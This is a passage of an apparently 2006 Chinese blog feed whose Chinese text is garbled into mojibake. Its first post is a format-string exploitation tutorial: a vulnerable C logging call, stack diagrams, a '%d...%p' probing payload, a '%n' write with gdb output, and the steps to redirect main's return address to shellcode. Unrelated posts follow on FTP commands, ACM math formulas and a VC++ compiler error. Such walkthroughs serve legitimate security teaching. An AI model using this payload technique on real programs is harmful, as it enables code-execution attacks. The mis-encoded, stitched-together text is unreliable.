聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)snprintf(buf, BUFSIZE -1 , "argv[%d] = %.200s", i, argv[i]);
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)buf[BUFSIZE-1] = '\0';
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)log(LOG_ALERT, buf);聽(tīng)聽(tīng)// 榪欓噷鏈夐棶棰?br />聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)printf("argv[%d] = %s \n", i, argv[i]);
聽(tīng)聽(tīng)聽(tīng)聽(tīng)}
聽(tīng)聽(tīng)}
}
<- end ->聽(tīng)聽(tīng)

榪欎釜鏈夐棶棰樼殑紼嬪簭鍦ㄨ皟鐢ㄥ瓙鍑芥暟l(fā)og()鐨勬椂鍊欙紝閿欒鐨勫皢buf鏀懼埌浜?fmt鎵瀵瑰簲鐨勪綅緗笂錛?br />鑰宐uf鐨勫唴瀹逛腑鐨勪竴閮ㄥ垎鏄敤鎴瘋緭鍏ョ殑錛岃屼笖娌℃湁鍋氫換浣曟鏌ャ傝櫧鐒剁▼搴忓叾浣欏湴鏂歸兘姣旇緝
灝忓績(jī)鍦頒嬌鐢ㄤ簡(jiǎn)vsnprintf(),snprintf(),涓嶄細(xì)鍙戠敓閫氬父鐨勭紦鍐插尯婧㈠嚭闂銆備絾榪欎釜鏍煎紡鍖?br />涓茬殑閿欒涔熷皢鏄嚧鍛界殑銆?br />
鎴戜滑鍏堟潵鍒嗘瀽涓涓嬪浣曡繘琛屾敾鍑匯傛垜浠湅鍒癿ain()鍑芥暟浼?xì)灏嗗懡渥o(hù)琛屽弬鏁版嫹璐濆埌buf涓幓銆?br />鍓嶉潰榪樺姞涓婁簡(jiǎn)"argv[%d] = "瀛楃涓詫紝鍦ㄥ弬鏁頒釜鏁板皬浜?0鐨勬儏鍐典笅錛岃繖涓瓧絎︿覆鐨勯暱搴︿負(fù)
10瀛楄妭銆傛垜浠冭檻鏋勯犺繖鏍風(fēng)殑瀛楃涓蹭綔涓哄懡浠よ鍙傛暟錛?br />"align|RET|%d%d...%.SH_RETd|%n"

"align"錛毬?tīng)聽(tīng)鐢ㄦ潵璋冩暣buf寮澶寸殑鏁版嵁闀垮害涓?鐨勬暣鏁?br />"RET":聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)鏄痬ain()鎴栬卨og()鍑芥暟鐨勮繑鍥炲湴鍧浣嶇疆錛屾垜浠細(xì)灝唖hellcode鐨勫湴鍧鏀懼埌RET涓幓錛?br />"SH_RET":聽(tīng)聽(tīng)鎴戜滑瀛樻斁shellcode鐨勫湴鍧
"%d...%d": 榪欎簺%d鐢ㄦ潵浣?n鎵瀵瑰簲鐨勫湴鍧鍒氬ソ鏄偍瀛楻ET鐨勫湴鍧

鎴戜滑鏉ョ湅鐪嬪湪絎竴嬈¤皟鐢╨og()鏃訛紝鍫嗘爤涓殑鎯呭喌

聽(tīng)聽(tīng)淇濆瓨ebp 淇濆瓨eip 鍙傛暟1聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)鍙傛暟2聽(tīng)聽(tīng)鍙橀噺i 鍙橀噺num聽(tīng)聽(tīng)緙撳啿鍖篵uf
-----------------------------------------------------------------------
|聽(tīng)聽(tīng)EBP聽(tīng)聽(tīng)|聽(tīng)聽(tīng)EIP聽(tīng)聽(tīng)|LOG_ALERT| &buf |聽(tīng)聽(tīng)i聽(tīng)聽(tīng)|聽(tīng)聽(tīng)num聽(tīng)聽(tīng)|"argv[1] = "| argv[1] |聽(tīng)聽(tīng)
-----------------------------------------------------------------------
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)^聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)^聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)|__fmt |__ap
浣庡潃聽(tīng)聽(tīng)---------------------->---------------------------------->聽(tīng)聽(tīng)楂樺潃

聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
鍦ㄦ墽琛屽畬聽(tīng)聽(tīng)va_start(ap, fmt) 鍚庯紝鍙樺弬鎸囬拡ap鎸囧悜fmt鐨勪笅涓涓湴鍧錛屼篃灝辨槸main()
鍑芥暟灞閮ㄥ彉閲廼鐨勫湴鍧錛屽鏋滄垜浠彁渚涚殑argv[1]鐨勬槸榪欐牱鐨勫瓧絎︿覆:
"xxabcd%d%d%d%d%d%p"
閭d箞鍫嗘爤涓殑鎯呭喌灝辨槸榪欐牱:


淇濆瓨ebp 淇濆瓨eip 鍙傛暟1聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)鍙傛暟2 鍙橀噺i 鍙橀噺num聽(tīng)聽(tīng)緙撳啿鍖篵uf
--------------------------------------------------------------------------------
|聽(tīng)聽(tīng)EBP聽(tīng)聽(tīng)|聽(tīng)聽(tīng)EIP聽(tīng)聽(tīng)|LOG_ALERT| &buf |聽(tīng)聽(tīng)i | num |"argv[1] = xx"|"abcd"|%d%d%d%d%d%p|
--------------------------------------------------------------------------------
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)^聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)^ 4B聽(tīng)聽(tīng)聽(tīng)4B聽(tīng)聽(tīng)聽(tīng)12B聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)^聽(tīng)聽(tīng)RET聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)|聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)|__fmt |__ap聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)|__________________|
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
浣庡潃聽(tīng)聽(tīng)---------------------->---------------------------------->聽(tīng)聽(tīng)楂樺潃

鍥犱負(fù)"argv[1] = "闀挎槸10瀛楄妭錛屾垜浠敤涓や釜瀛楄妭"xx"鏉ヤ嬌鍏跺彉鎴?鐨勬暣鏁板?12瀛楄妭銆傚洜姝わ紝
浠庡彉閲廼鐨勫湴鍧鍒?abcd"涔嬮棿鍏辨湁4+4+12=20瀛楄妭錛?0/4=5,鍥犳鎴戜滑闇瑕佺敤5涓?d鏉ュ搴旇繖5
涓湴鍧錛岃繖鏍鋒渶鍚庝竴涓牸寮忓寲涓?p灝卞搴斾簡(jiǎn)"abcd"鐨勫湴鍧錛屽洜姝ゆ墦鍗板嚭鏉ュ簲璇ユ槸:
"0x64636261"
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
[root@rh62 format]# ./vul xxabcd%d%d%d%d%d%p
argv[1] = xxabcd%d%d%d%d%d%p
[root@rh62 format]# tail -1 /var/log/messages
Jul 12 04:13:08 rh62 vul: [hmm]: argv[1] = xxabcd2119864909775429783952021138493
0x64636261

娉ㄦ剰鏈鍚庣殑0x64636261,榪欒鏄庢垜浠墠闈㈢殑鍒嗘瀽鏄紜殑銆傚鏋滄垜浠皢%p鎹㈡垚%n,vsnprintf
()灝變細(xì)灝嗘墦鍗伴暱搴﹀瓨鏀懼埌0x64636261涓幓錛屽綋鐒惰繖鑲畾浼?xì)瀵艰嚧娈甸敊璇?br />
[root@rh62 format]# gdb ./vul
GNU gdb 19991004
<...>
(gdb) r xxabcd%d%d%d%d%d%n
Starting program: /root/./vul xxabcd%d%d%d%d%d%n


Program received signal SIGSEGV, Segmentation fault.
0x400622b7 in _IO_vfprintf (s=0xbffff224,
聽(tīng)聽(tīng)聽(tīng)聽(tīng)format=0xbffff738 "argv[1] = xxabcd%d%d%d%d%d%n", ap=0xbffff748)
聽(tīng)聽(tīng)聽(tīng)聽(tīng)at vfprintf.c:1212
1212聽(tīng)聽(tīng)聽(tīng)聽(tīng)vfprintf.c: No such file or directory.
(gdb) x/i $pc
0x400622b7 <_IO_vfprintf+2455>: mov聽(tīng)聽(tīng)聽(tīng)聽(tīng)%eax,(%ecx)
(gdb) i reg $eax $ecx
eax聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)0x2f聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)47
ecx聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)0x64636261聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)1684234849
(gdb)

鎴戜滑鐪嬪埌錛宔ax涓繚瀛樼殑鏄墦鍗扮殑鎬婚暱搴?47, vsnprintf()鍦ㄥ皢榪欎釜鍊間繚瀛樺埌$ecx涓幓鏃?br />鍙戠敓浜?jiǎn)娈甸敊璇傚鏋滄垜浠皢RET鎹㈡垚淇濆瓨main鍑芥暟榪斿洖鍦板潃鐨勫湴鍧錛屽氨浼?xì)灏啒q欎釜闀垮害瀛樻斁
鍒伴偅閲屽幓錛屽鏋滆繖涓暱搴︾殑鍊煎垰濂界瓑浜庢垜浠瓨鏀緎hellcode鐨勫湴鍧錛岄偅涔堝綋main()榪斿洖鏃?br />灝變細(xì)璺沖埌鎴戜滑鐨剆hellcode鍘昏繍琛屼簡(jiǎn)銆?img src ="http://m.shnenglu.com/asp/aggbug/13921.html" width = "1" height = "1" />

Asp 2006-10-20 20:54 鍙戣〃璇勮
]]>FTP鍛戒護(hù)澶у叏http://m.shnenglu.com/asp/archive/2006/10/20/13920.htmlAspAspFri, 20 Oct 2006 12:48:00 GMThttp://m.shnenglu.com/asp/archive/2006/10/20/13920.htmlhttp://m.shnenglu.com/asp/comments/13920.htmlhttp://m.shnenglu.com/asp/archive/2006/10/20/13920.html#Feedback0http://m.shnenglu.com/asp/comments/commentRss/13920.htmlhttp://m.shnenglu.com/asp/services/trackbacks/13920.htmlFTP鍛戒護(hù)鏄疘nternet鐢ㄦ埛浣跨敤鏈棰戠箒鐨勫懡浠や箣涓錛岀啛鎮(zhèn)夊茍鐏墊椿搴旂敤FTP鐨勫唴閮ㄥ懡浠わ紝鍙互澶уぇ鏂逛究浣跨敤鑰咃紝騫舵敹鍒頒簨鍗婂姛鍊嶄箣鏁堛?br />濡傛灉浣犳兂瀛︿範(fàn)浣跨敤榪涜鍚庡彴FTP涓嬭澆錛岄偅涔堝氨蹇呴』瀛︿範(fàn)FTP鎸囦護(hù)銆?br />FTP鐨勫懡浠よ鏍煎紡涓猴細(xì) ftp -v -d -i -n -g [涓繪満鍚峕 錛?br />鍏朵腑 -v 鏄劇ず榪滅▼鏈嶅姟鍣ㄧ殑鎵鏈夊搷搴斾俊鎭紱
-n 闄愬埗ftp鐨勮嚜鍔ㄧ櫥褰曪紝鍗充笉浣跨敤錛?n etrc鏂囦歡錛?br />-d 浣跨敤璋冭瘯鏂瑰紡錛?br />-g 鍙栨秷鍏ㄥ眬鏂囦歡鍚嶃?br />FTP浣跨敤鐨勫唴閮ㄥ懡浠ゅ涓?涓嫭鍙瘋〃紺哄彲閫夐」):
1.![cmd[args>錛氬湪鏈湴鏈轟腑鎵ц浜や簰shell錛宔xit鍥炲埌ftp鐜錛屽錛?ls*.zip
2.$ macro-ame[args]錛?鎵ц瀹忓畾涔塵acro-name銆?br />3.account[password]錛?鎻愪緵鐧誨綍榪滅▼緋葷粺鎴愬姛鍚庤闂郴緇熻祫婧愭墍闇鐨勮ˉ鍏呭彛浠ゃ?br />4.append local-file[remote-file]錛氬皢鏈湴鏂囦歡榪藉姞鍒拌繙紼嬬郴緇熶富鏈猴紝鑻ユ湭鎸囧畾榪滅▼緋葷粺鏂囦歡鍚嶏紝鍒欎嬌鐢ㄦ湰鍦版枃浠跺悕銆?br />5.ascii錛氫嬌鐢╝scii綾誨瀷浼犺緭鏂瑰紡銆?br />6.bell錛氭瘡涓懡浠ゆ墽琛屽畬姣曞悗璁$畻鏈哄搷閾冧竴嬈°?br />7.bin錛氫嬌鐢ㄤ簩榪涘埗鏂囦歡浼犺緭鏂瑰紡銆?br />8.bye錛氶鍑篺tp浼?xì)璇潣q囩▼銆?br />9.case錛氬湪浣跨敤mget鏃訛紝灝嗚繙紼嬩富鏈烘枃浠跺悕涓殑澶у啓杞負(fù)灝忓啓瀛楁瘝銆?br />10.cd remote-dir錛氳繘鍏ヨ繙紼嬩富鏈虹洰褰曘?br />11.cdup錛氳繘鍏ヨ繙紼嬩富鏈虹洰褰曠殑鐖剁洰褰曘?br />12.chmod mode file-name錛氬皢榪滅▼涓繪満鏂囦歡file-name鐨勫瓨鍙栨柟寮忚緗負(fù)mode錛屽錛歝hmod 777 a.out銆?br />13.close錛氫腑鏂笌榪滅▼鏈嶅姟鍣ㄧ殑ftp浼?xì)璇?涓巓pen瀵瑰簲)銆?br />14.cr錛氫嬌鐢╝sscii鏂瑰紡浼犺緭鏂囦歡鏃訛紝灝嗗洖杞︽崲琛岃漿鎹負(fù)鍥炶銆?br />15.delete remote-file錛氬垹闄よ繙紼嬩富鏈烘枃浠躲?br />16.debug[debug-value]錛氳緗皟璇曟柟寮忥紝 鏄劇ず鍙戦佽嚦榪滅▼涓繪満鐨勬瘡鏉″懡浠わ紝濡傦細(xì)deb up 3錛岃嫢璁句負(fù)0錛岃〃紺哄彇娑坉ebug銆?br />17.dir[remote-dir][local-file]錛氭樉紺鴻繙紼嬩富鏈虹洰褰曪紝騫跺皢緇撴灉瀛樺叆鏈湴鏂囦歡
18.disconnection錛氬悓close銆?br />19.form format錛氬皢鏂囦歡浼犺緭鏂瑰紡璁劇疆涓篺ormat錛岀己鐪佷負(fù)file鏂瑰紡銆?br />20.get remote-file[local-file]錛?灝嗚繙紼嬩富鏈虹殑鏂囦歡remote-file浼犺嚦鏈湴紜洏鐨刲ocal-file銆?br />21.glob錛氳緗甿delete錛宮get錛宮put鐨勬枃浠跺悕鎵╁睍錛岀己鐪佹椂涓嶆墿灞曟枃浠跺悕錛屽悓鍛戒護(hù)琛岀殑-g鍙傛暟銆?br />22.hash錛氭瘡浼犺緭1024瀛楄妭錛屾樉紺轟竴涓猦ash絎﹀彿(#)銆?br />23.help[cmd]錛氭樉紺篺tp鍐呴儴鍛戒護(hù)cmd鐨勫府鍔╀俊鎭紝濡傦細(xì)help get銆?br />24.idle[seconds]錛氬皢榪滅▼鏈嶅姟鍣ㄧ殑浼戠湢璁℃椂鍣ㄨ涓篬seconds]縐掋?br />25.image錛氳緗簩榪涘埗浼犺緭鏂瑰紡(鍚宐inary)銆?br />26.lcd[dir]錛氬皢鏈湴宸ヤ綔鐩綍鍒囨崲鑷砫ir銆?br />27.ls[remote-dir][local-file]錛氭樉紺鴻繙紼嬬洰褰時(shí)emote-dir錛?騫跺瓨鍏ユ湰鍦版枃浠秎ocal-file銆?br />28.macdef macro-name錛氬畾涔変竴涓畯錛岄亣鍒癿acdef涓嬬殑絀鴻鏃訛紝瀹忓畾涔夌粨鏉熴?br />29.mdelete[remote-file]錛氬垹闄よ繙紼嬩富鏈烘枃浠躲?br />30.mdir remote-files local-file錛氫笌dir綾諱技錛屼絾鍙寚瀹氬涓繙紼嬫枃浠訛紝濡?錛歮dir *.o.*.zipoutfile 銆?br />31.mget remote-files錛氫紶杈撳涓繙紼嬫枃浠躲?br />32.mkdir dir-name錛氬湪榪滅▼涓繪満涓緩涓鐩綍銆?br />33.mls remote-file local-file錛氬悓nlist錛屼絾鍙寚瀹氬涓枃浠跺悕銆?br />34.mode[modename]錛氬皢鏂囦歡浼犺緭鏂瑰紡璁劇疆涓簃odename錛?緙虹渷涓簊tream鏂瑰紡銆?br />35.modtime file-name錛氭樉紺鴻繙紼嬩富鏈烘枃浠剁殑鏈鍚庝慨鏀規(guī)椂闂淬?br />36.mput local-file錛氬皢澶氫釜鏂囦歡浼犺緭鑷寵繙紼嬩富鏈恒?br />37.newer file-name錛?濡傛灉榪滅▼鏈轟腑file-name鐨勪慨鏀規(guī)椂闂存瘮鏈湴紜洏鍚屽悕鏂囦歡鐨勬椂闂存洿榪戯紝鍒欓噸浼犺鏂囦歡銆?br />38.nlist[remote-dir][local-file]錛氭樉紺鴻繙紼嬩富鏈虹洰褰曠殑鏂囦歡娓呭崟錛屽茍瀛樺叆鏈湴紜洏鐨刲ocal-file銆?br />39.nmap[inpattern outpattern]錛氳緗枃浠跺悕鏄犲皠鏈哄埗錛?浣垮緱鏂囦歡浼犺緭鏃訛紝鏂囦歡涓殑鏌愪簺瀛楃鐩鎬簰杞崲錛?濡傦細(xì)nmap $1.$2.$3[$1錛?2].[$2錛?3]錛屽垯浼犺緭鏂囦歡a1.a2.a3鏃訛紝鏂囦歡鍚嶅彉?shù)负a1錛宎2銆?璇ュ懡浠ょ壒鍒傜敤浜庤繙紼嬩富鏈轟負(fù)闈濽NIX鏈虹殑鎯呭喌銆?br />40.ntrans[inchars[outchars>錛氳緗枃浠跺悕瀛楃鐨勭炕璇戞満鍒訛紝濡俷trans1R錛屽垯鏂囦歡鍚峀LL灝嗗彉?shù)负RRR銆?br />41.open host[port]錛氬緩绔嬫寚瀹歠tp鏈嶅姟鍣ㄨ繛鎺ワ紝鍙寚瀹氳繛鎺ョ鍙c?br />42.passive錛氳繘鍏ヨ鍔ㄤ紶杈撴柟寮忋?br />43.prompt錛氳緗涓枃浠朵紶杈撴椂鐨勪氦浜掓彁紺恒?br />44.proxy ftp-cmd錛氬湪嬈¤鎺у埗榪炴帴涓紝鎵ц涓鏉tp鍛戒護(hù)錛?璇ュ懡浠ゅ厑璁歌繛鎺ヤ袱涓猣tp鏈嶅姟鍣紝浠ュ湪涓や釜鏈嶅姟鍣ㄩ棿浼犺緭鏂囦歡銆傜涓鏉tp鍛戒護(hù)蹇呴』涓簅pen錛屼互棣栧厛寤虹珛涓や釜鏈嶅姟鍣ㄩ棿鐨勮繛鎺ャ?br />45.put local-file[remote-file]錛氬皢鏈湴鏂囦歡local-file浼犻佽嚦榪滅▼涓繪満銆?br />46.pwd錛氭樉紺鴻繙紼嬩富鏈虹殑褰撳墠宸ヤ綔鐩綍銆?br />47.quit錛氬悓bye錛岄鍑篺tp浼?xì)璇濄?br />48.quote arg1錛宎rg2...錛氬皢鍙傛暟閫愬瓧鍙戣嚦榪滅▼ftp鏈嶅姟鍣紝濡傦細(xì)quote syst.
49.recv remote-file[local-file]錛氬悓get銆?br />50.reget remote-file[local-file]錛氱被浼間簬get錛?浣嗚嫢local-file瀛樺湪錛屽垯浠庝笂嬈′紶杈撲腑鏂緇紶銆?br />51.rhelp[cmd-name]錛氳姹傝幏寰楄繙紼嬩富鏈虹殑甯姪銆?br />52.rstatus[file-name]錛氳嫢鏈寚瀹氭枃浠跺悕錛屽垯鏄劇ず榪滅▼涓繪満鐨勭姸鎬侊紝 鍚﹀垯鏄劇ず鏂囦歡鐘舵併?br />53.rename[from][to]錛氭洿鏀硅繙紼嬩富鏈烘枃浠跺悕銆?br />54.reset錛氭竻闄ゅ洖絳旈槦鍒椼?br />55.restart marker錛氫粠鎸囧畾鐨勬爣蹇梞arker澶勶紝閲嶆柊寮濮媑et鎴杙ut錛屽錛歳estart 130銆?br />56.rmdir dir-name錛氬垹闄よ繙紼嬩富鏈虹洰褰曘?br />57.runique錛氳緗枃浠跺悕鍙竴鎬у瓨鍌紝鑻ユ枃浠跺瓨鍦紝鍒欏湪鍘熸枃浠跺悗鍔犲悗緙.1錛?.2絳夈?br />58.send local-file[remote-file]錛氬悓put銆?br />59.sendport錛氳緗甈ORT鍛戒護(hù)鐨勪嬌鐢ㄣ?br />60.site arg1錛宎rg2...錛氬皢鍙傛暟浣滀負(fù)SITE鍛戒護(hù)閫愬瓧鍙戦佽嚦榪滅▼ftp涓繪満銆?br />61.size file-name錛氭樉紺鴻繙紼嬩富鏈烘枃浠跺ぇ灝忥紝濡傦細(xì)site idle 7200銆?br />62.status錛氭樉紺哄綋鍓峟tp鐘舵併?br />63.struct[struct-name]錛氬皢鏂囦歡浼犺緭緇撴瀯璁劇疆涓簊truct-name錛?緙虹渷鏃朵嬌鐢╯tream緇撴瀯銆?br />64.sunique錛氬皢榪滅▼涓繪満鏂囦歡鍚嶅瓨鍌ㄨ緗負(fù)鍙竴(涓巖unique瀵瑰簲)銆?br />65.system錛氭樉紺鴻繙紼嬩富鏈虹殑鎿嶄綔緋葷粺綾誨瀷銆?br />66.tenex錛氬皢鏂囦歡浼犺緭綾誨瀷璁劇疆涓篢ENEX鏈虹殑鎵闇鐨勭被鍨嬨?br />67.tick錛氳緗紶杈撴椂鐨勫瓧鑺傝鏁板櫒銆?br />68.trace錛氳緗寘璺熻釜銆?br />69.type[type-name]錛氳緗枃浠朵紶杈撶被鍨嬩負(fù)type-name錛岀己鐪佷負(fù)ascii錛屽:type binary錛岃緗簩榪涘埗浼犺緭鏂瑰紡銆?br />70.umask[newmask]錛氬皢榪滅▼鏈嶅姟鍣ㄧ殑緙虹渷umask璁劇疆涓簄ewmask錛屽錛歶mask 3
71.user user-name[password][account]錛氬悜榪滅▼涓繪満琛ㄦ槑鑷繁鐨勮韓浠斤紝闇瑕佸彛浠ゆ椂錛屽繀欏昏緭鍏ュ彛浠わ紝濡傦細(xì)user anonymous my@email 銆?br />72.verbose錛氬悓鍛戒護(hù)琛岀殑-v鍙傛暟錛屽嵆璁劇疆璇﹀敖鎶ュ憡鏂瑰紡錛宖tp 鏈嶅姟鍣ㄧ殑鎵鏈夊搷 搴旈兘灝嗘樉紺虹粰鐢ㄦ埛錛岀己鐪佷負(fù)on.
73.?[cmd]錛氬悓help.

Asp 2006-10-20 20:48 鍙戣〃璇勮
]]>ACM浼?xì)鐢ㄥ埌鐨勪竴鐐規(guī)暟瀛︾煡璇?/title><link>http://m.shnenglu.com/asp/archive/2006/10/14/13665.html</link><dc:creator>Asp</dc:creator><author>Asp</author><pubDate>Sat, 14 Oct 2006 03:24:00 GMT</pubDate><guid>http://m.shnenglu.com/asp/archive/2006/10/14/13665.html</guid><wfw:comment>http://m.shnenglu.com/asp/comments/13665.html</wfw:comment><comments>http://m.shnenglu.com/asp/archive/2006/10/14/13665.html#Feedback</comments><slash:comments>2</slash:comments><wfw:commentRss>http://m.shnenglu.com/asp/comments/commentRss/13665.html</wfw:commentRss><trackback:ping>http://m.shnenglu.com/asp/services/trackbacks/13665.html</trackback:ping><description><![CDATA[1.璐歸┈灝忓畾鐞嗭細(xì)a^p聽(tīng)mod聽(tīng)p=a聽(tīng)(p涓虹礌鏁幫紝涓攁涓嶆槸p鐨勫嶆暟)<br /><br />2.鏁皀鐨勭害鏁頒釜鏁幫細(xì)<br />n鍒嗚В鍥犳暟涓簆1^s1*p2^s2*鈥︹m^sm<br />鍒欑害鏁頒釜鏁頒負(fù)(s1+1)*(s2+1)*鈥︹?(sm+1)<br /><br />3.Fibonacci鏁伴氶」鍏紡錛欶n=round((1+鈭?)/2)^n/鈭?<br /><br />4.Catalan鏁伴氶」鍏紡錛欳n=C(2n-2,n-1)/n<br />閫掑綊寮忥細(xì)Cn=鈭慍i*C(n-i)聽(tīng)(i=1..n-1,C1=C2=1)<br /><br />5.絎簩綾籗tirling鏁幫細(xì)S(n,k)琛ㄧずn涓厓绱犵殑闆嗗悎鎷嗗垎鎴恔閮ㄥ垎鐨勬暟<br />S(n,k)=S(n-1,k-1)+k*S(n-1,k)<br /><br />6.鏁存暟鍒嗘媶錛歅(n,k)-鏁存暟n鍒嗘垚k閮ㄥ垎鐨勬暟<br />P(n,k)=P(n-1,k-1)+P(n-k,k)<br /><br />7.鏂圭▼x1+x2+鈥︹?xk=n聽(tīng)(xi>=0)鐨勮В鐨勪釜鏁幫細(xì)C(n+k-1,k-1)<br />鏂圭▼x1+x2+鈥︹?xk=n聽(tīng)(xi>0)鐨勮В鐨勪釜鏁幫細(xì)C(n-1,k-1)<br /><img src ="http://m.shnenglu.com/asp/aggbug/13665.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://m.shnenglu.com/asp/" target="_blank">Asp</a> 2006-10-14 11:24 <a href="http://m.shnenglu.com/asp/archive/2006/10/14/13665.html#Feedback" target="_blank" style="text-decoration:none;">鍙戣〃璇勮</a></div>]]></description></item><item><title>Compiling... ,Error spawning cl.exehttp://m.shnenglu.com/asp/archive/2006/10/08/13465.htmlAspAspSun, 08 Oct 2006 12:09:00 GMThttp://m.shnenglu.com/asp/archive/2006/10/08/13465.htmlhttp://m.shnenglu.com/asp/comments/13465.htmlhttp://m.shnenglu.com/asp/archive/2006/10/08/13465.html#Feedback10http://m.shnenglu.com/asp/comments/commentRss/13465.htmlhttp://m.shnenglu.com/asp/services/trackbacks/13465.html聽(tīng)聽(tīng)聽(tīng) 浠婂ぉ鍚屽瑁呬簡(jiǎn)MS VC++6.0鍚庯紝緙栬瘧紼嬪簭鍗村嚭鐜頒簡(jiǎn)榪欎釜鎻愮ず錛欳ompiling... ,Error spawning cl.exe錛岄噸瑁呴兘娌℃湁鐢紝濂介儊闂封︹︿箣鍚庢鍑嗗鎹㈡湰紕熼噸鏂拌鐨勬椂鍊欙紝鎴戜滑鍦╒C鐨勫伐鍏?銆夐夐」-銆夌洰褰曢噷闈㈠彂鐜頒簡(jiǎn)涓鏍蜂笢瑗匡紝閲岄潰鐨処nclude Files錛孍xecutable Files錛孡ibrary Files鍜孲ource Files涓嬮潰鐨勭洰褰曞叏閮ㄩ兘涓嶅錛屾垜浠槸鎶奦C++瑁呭埌"D:\Program Files\Microsoft Visual Studio\VC98"涓嬮潰錛屼絾鏄噷闈㈠啓鐨勫叏鏄?C:\Program Files\Microsoft Visual Studio\VC98"錛屼簬鏄珛椹敼榪囨潵錛屽啀璇曪紝OK錛屽眳鐒跺氨鍙互緙栬瘧浜?jiǎn)鈥︹﹀樋鍢庫(kù)︹?br />聽(tīng)聽(tīng)聽(tīng) 